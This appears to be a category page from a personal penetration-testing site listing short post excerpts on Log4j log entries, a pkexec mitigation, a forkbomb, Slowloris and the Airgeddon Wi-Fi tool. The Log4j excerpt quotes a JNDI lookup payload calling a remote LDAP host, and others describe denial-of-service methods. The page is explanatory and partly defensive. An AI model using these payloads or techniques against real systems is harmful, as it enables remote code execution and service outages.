^

Penetration-testing

Category about Penetration-testing

Vulnerabilities
[2022-01-29 22:55:42] How does a Fail Log4J Attack look in Logfiles [Penetration-Testing / Vulnerabilities]
[Fri Jan 28 03:42:04.636333 2022] [proxy:warn] [pid 30819] [client 98.0.242.10:46192] AH10188: Max-Forwards value '${jndi:ldap://X.X.X.X:1389/a}' could not be parsed, referer: ${jndi:ldap://X.X.X.X:1389/a} [Fri Jan 28 03:42:04.636394 2022] [proxy:error] [pid 30819] [client 98.0.242.10:46192] AH00898: Max-Forwards request header coul...
[2022-01-29 22:58:22] Polkit PKExec Vulnerability [Penetration-Testing / Vulnerabilities]
The most actual systems have an update for this. If not you can close this vulnerability by executing: chmod 0755 /usr/bin/pkexec This will remove the SUID Bit from the File. More info here: https://nvd.nist.gov/vuln/detail/CVE-2021-4034 Image for the Thumbnail: ...
Denial Of Service
[2020-08-25 02:17:30] DDOS Forkbomb [Penetration-Testing / Denial Of Service]
A forkbomb is a denial of service bash command that blocks the server, duo to high cpu load. The script is creating a recursive function and is infinitly launching itself - so the system will be blocked. Usefull for testing vHosts which are sharing ressources if high load is affecting other hosts. (Thats the only thing that i could figure out what ...
[2020-08-25 01:41:02] DDOS Slowloris [Penetration-Testing / Denial Of Service]
Slowloris is a Denial of Service attack tool that starts a lot of HTTP requests to take down its target. A weak server can be taken down with a single pc if you have enough CPU power and enough threads running. But thats not guaranteed. Has been tested and approved as working for small web servers with > 10 users. The connection to the serve...
Compromising
[2020-08-25 02:00:07] HACKING Airgeddon [Penetration-Testing / Compromising]
Airgeddon is a multi use wireless audit tool. Its possible to pentest WEP and WPA2 Networks. Its included into a security parrot and KALI installation. The main features are Evil Twin Attacks/ Package Capturing and there is a Bruteforce Cracker included with aircrack-ng - but for better performance you should use something like hashcat with GPU sup...
Theme
Switch: 221 | Arrive: 328
This Website is using Session Cookies for Site Functionality and AWStats.
Staff may be MiA!